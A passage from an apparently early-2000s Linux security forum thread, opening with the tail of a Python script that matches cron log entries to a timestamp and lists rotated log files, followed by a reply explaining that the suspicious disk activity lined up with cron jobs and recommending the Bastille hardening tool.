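                found.setdefault(name, []).append(entry)
    return found


def make_demo_log_dir():
    """Constructed stand-in for /var/log so the example runs anywhere."""
    d = tempfile.mkdtemp(prefix="demo_var_log_")
    for fname in ("access_log", "access_log.1.gz", "messages", "messages-20030213.gz", "secure"):
        open(os.path.join(d, fname), "w").close()
    return d


if __name__ == "__main__":
    # BlAcKiE noticed the logs vanish at about 07:15; see what cron was doing then.
    for ts, prog, msg in cron_events_near(SYSLOG_EXCERPT, "Feb 13 07:15:00"):
        print(ts, prog, msg)
    print(rotated_copies(make_demo_log_dir()))
```

On the real box the second call would be `rotated_copies("/var/log")` with the first argument of `cron_events_near` read from /var/log/cron; a cron.daily job finishing within seconds of the "hdd activity" is the correlation Phat_Penguin points out in post #9.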

  10. #10
    Senior Member
    Join Date
    Dec 2002
    Posts
    144
    Originally posted here by Phat_Penguin
    Refer back to nebulus200's first reply .... that line returned a 404 message (File not found) so basically it's knocking on the door but can't come in - nothing to worry about.

    I see the hdd activity corresponded with cron job time stamps. That would explain the activity.

    If you are new to linux check out Bastille at http://www.bastille-linux.org, it is a hardening/firewall script which has been written for Redhat and others and will help you lock down your machine fairly securely until you get the hang of things. It has a user friendly GUI and has a step by step configuration with explanations as to what it is doing - so the set up is fairly straight forward.

    As you are on an adsl connection you really do need to lock the machine down as you will be a prime target for crackers.
    But what do you suspect could have happened? Thanks for providing the site... I will try to harden it from now on.
    BlAcKiE
    GearBlitz
